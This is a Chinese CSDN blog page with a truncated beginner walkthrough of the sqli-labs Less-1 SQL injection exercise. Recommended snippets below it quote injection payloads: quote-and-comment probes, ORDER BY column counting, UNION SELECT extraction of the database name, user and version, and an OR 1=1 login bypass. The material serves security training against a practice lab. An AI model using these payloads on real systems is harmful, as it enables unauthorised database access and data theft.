sqli-labs page-1 less-1超精讲解

最新推荐文章于 2022-03-18 16:30:05 发布

qq_53425402

最新推荐文章于 2022-03-18 16:30:05 发布

阅读量140

点赞数 1

分类专栏： sqli—labs 文章标签： sql

本文链接：https://blog.csdn.net/qq_53425402/article/details/119675480

版权

本文详细介绍了SQL注入攻击的一种常见场景，通过一系列步骤判断数据库语句类型，确定为字符型。接着利用ORDER BY、UNION SELECT和LIMIT等关键字进行数据库、表、字段及数据的探测，为初学者提供了清晰的操作指南。

摘要由CSDN通过智能技术生成

Sql注入相关的题，尤其看到提示要我们输入带参数的值时。

我们第一步要判断的是数据库语句语法数字型还是字符型。

字符型判断：

第一步：?id=1'（返回存在语法错误）

第一步：?id=1' and 1=1 %23（有返回值）

第二部就：?id=2' and 1=2 %23（返回错误）

数字型判断：

第一步：?id=1（有返回值）

第二步：?id=1 and 1=1（有返回值）

第三步：?id=1 and 1=2（返回存在语法错误）

一、?id=1' （发现存在语法错误）

二、?id=1' and 1=1 %23

（注释：%23是ASCII表中#的对应值，和--+一样都起注释的意思）

最低0.47元/天解锁文章

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

qq_53425402

关注关注

1
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
复制链接

分享到 QQ

分享到新浪微博

扫一扫

专栏目录

Sqli-labs靶场第12关详解[Sqli-labs-less-12]

m0_73615178的博客

03-02

804

所以，payload分析输入一个username值然后使用单引号加小括号 ") 闭合前面的语句，然后为了使where语句条件成立，加上一个or 1=1 ，-- 注释语句使后面的语句直接注释password不用判断。由于这题是post请求，所以先使用burp进行抓包，然后将数据包存入txt文件中打包用-r 选择目标txt文件。根据题目看，像一个登录页面，尝试使用布尔型盲注测试能否登录网站。输入：-admin") union select 1,2--爆出当前数据库名称及当前用户名。

SQLI-LABS Less-7 到 Less-8

Web学习之路

03-20

308

布尔盲注

参与评论您还未登录，请先登录后发表或查看评论

sql注入：sqli-labs Page1 Less1

MYOOP的博客

03-17

159

这里写自定义目录标题欢迎使用Markdown编辑器新的改变功能快捷键合理的创建标题，有助于目录的生成如何改变文本的样式插入链接与图片如何插入一段漂亮的代码片生成一个适合你的列表创建一个表格设定内容居中、居左、居右SmartyPants创建一个自定义列表如何创建一个注脚注释也是必不可少的KaTeX数学公式新的甘特图功能，丰富你的文章UML 图表FLowchart流程图导出与导入导出导入欢迎使用Ma...

sqli-libs攻略入门(1-4)

shijianyoulei6的博客

06-30

2723

从根本上讲，当开发人员对用户的输入过滤不严，造成了用户可以通过输入SQL语句控制数据库，就会产生SQL注入漏洞。为了省时间，快速的学习了解SQL注入，这里使用Windows sever 2008 R2+phpstudy环境首先需要在源代码中添加这两个语句，使网页能够回显执行的有效sql语句 echo”有效输入”.$id.”<br>” echo”执行的sql语句”.$sql...

小菜鸡的学习笔记——sql注入之sqli-lab边学边练

m0_51581045的博客

03-03

3755

小菜鸡也有大梦想

Sqli-labs第一题详解

未完成的歌~的博客

06-10

2054

less1: 根据题目提示为单引号注入，先测试一下果然报错了，说明我们添加的单引号被数据库成功解析，那我们就可以通过闭合id这个参数 ,然后构造自己的sql语句进行攻击。一般可以使用联合表的方式来提取自己感兴趣的信息（union），但是使用union语句有个前提就是union 后面的语句必须与前面的语句字段数以及类型必须一直，否则数据库会报错。 ...

在SQL注入中常用的mysql语法

孤的博客

10-29

924

user()返回当前数据库连接使用的用户； database()返回当前数据库连接使用的数据库； version()返回当前数据库的版本； concat-ws() 函数可以将这些函数进行组合使用并显示出来。concat函数中，将其中的参数直接连接起来产生新的字符串。而在concat_ws函数中，第一个参数是用于作为分隔符将后面各个参数的内容分隔开来再进行相应的连接产生新的字符串。 concat_w...

SQLi-LABS Page-1(Basic Challenges)1-22

05-18

### SQLi-LABS Page-1 (Basic Challenges)1-22 知识点解析 #### 第一关：Less-1 - 字符型注入在这一关卡中，我们需要找到一个可注入点，并通过该点执行SQL注入攻击。具体步骤如下： 1. **访问靶场**： - 访问...

SQLi-LABS Page-1(Basic Challenges)1-22关

05-18

sqli-labs-master:7878/Less-1/?id=-1'order by 3--+ ``` 如果页面正常显示，则表示该表至少有三列；如果页面显示错误，则说明少于三列。 **步骤2：获取数据库名称** 利用`union select`语句来提取数据库名称。示例...

联合注入的一些小心得

微笑的孤狼

12-08

301

一、 1、首先贴一个参考博客https://blog.csdn.net/u012763794/article/details/51207833 2、关于联合注入的很多细节博客中已经提及，这里只是说一下所需要的一些步骤注：以下实验来自bugku 中ctf中的成绩单一题二、首先判断数据库中是字符型或者是数字型。（1）使用单引号,双引号判断，id=1'或者id=1" （2）数字回显比如...

完成dvwas中sql注入模块的练习

S_cx666的博客

12-22

1053

完成dvwas中sql注入模块的练习

sql注入基础总结

alickr的博客

06-29

1817

单引号注入 /?id=1' order by (一个数字)--+ 遍历可以得到当前表的列数 /?id=-1' union select 1,2,3--+ 得到1，2，3 /?id=-1' union select 1,2,concat_ws(char(32, 58, 32), user(), database(), version)--+ 得到用户名，数据库名，版本号 /?i

搭建SQLo靶机与练习

weixin_51167520的博客

12-30

4388

SQLol安装实验器材：Window 7 windows 2008 下载地址：http://github.com/SpiderLabs/MCIR 安装流程： Window2008配置：解压压缩包到网站根路径（例如，我新建一个sql目录，存放压缩包内容）解压MCIR压缩包到c盘/xampp/htdocs/sql 打开c盘/xampp/htdocs/sql/sqlol/includes /database.config.php 修改username/username/username/password等

SQL宽字节注入

qq_64332865的博客

02-19

3398

宽字节注入适用于cms和数据库对字符串的编码方式不统一、WAF利用 AddSlashes()等函数对敏感字符进行转义的场景。统一的国际规范的理想状态是所有应用程序都使用Unicode编码，所有的网站都使用UTF-8编码。但因为一些历史原因，国内及国外（特别是非英语国家)的一些cms仍然使用着自己国家的一套编码（如GBK);也有一些cms为了考虑老用户，出了GBK和 UTF-8两个版本。一个GBK编码汉字，占用2个字节;一个UTF-8编码的汉字，占用3-4个字节。当Web应用程序的编码方式为GBK，而

★SQL注入漏洞（1）大纲和原理

weixin_51339377的博客

03-18

421

按照注入方法分类： 1.union select注入 2.报错函数注入法 3.盲注（布尔盲注/时间盲注） 4.堆叠查询注入注入类型： GET型注入 POST型注入（可以借助burpsuite）（更多的是针对账号和密码这种表单的形式） 1.数字型输入 2.字符型注入（XX型注入即("") ('')） 3.搜索型注入（like型） 4.报错函数注入适用：delete,insert/update 函数：updatexm...

sqli-labs day1

weixin_30906701的博客

10-16

练习sql注入的 github：https://github.com/Audi-1/sqli-labs 为了方便调试，可以在每关的index.php加上如下代码 echo "your sql statement is " . $sql . "<br>"; 预备知识： #的URL编码 %23 其他常见编码可以见 http://www.w3school.com.c...

sqli-labs学习记录（一）

csu_vc的博客

09-30

1031

0x01 less-1‘$id’ 单引号注入这里写代码片http://localhost/sqli-labs-master/Less-1/?id=14' order by 3-- + //猜字段http://localhost/sqli-labs-master/Less-1/?id=14' union select 1,2,3-- + //查看内容发现服务器依旧只返回了第一条查询的信息，

Sqli-labs解题一(Page-1-Basic Challenges)

Bird&Bird

01-05

1676

目录Less-1 单引号字符型注入Less-2 整型注入Less-3 Less-1 单引号字符型注入输入单引号’，页面报错如下根据报错知道是单引号字符型注入判断有多少列（ORDER BY 语句用于根据指定的列对结果集进行排序） ?id=1' order by 3 --+ 爆库名 ?id=-1' union select 1,database(),3 --+ 爆表名 ?id=-1' union select 1,group_concat(table_name) ,3 from informat

SQLi-LABS-Page-1(Basic-Challenges)-less1-22注入教程

残阳泼茶香的博客

03-17

1310

less 1 GET - Error based - Single quotes - String(基于错误的GET单引号字符型注入) http://localhost/sqli-labs/Less-1/?id=-1' or 1=1 union select 1,2,concat_ws(char(32,58,32),id,database(),password) from use...

sqli-labs-less1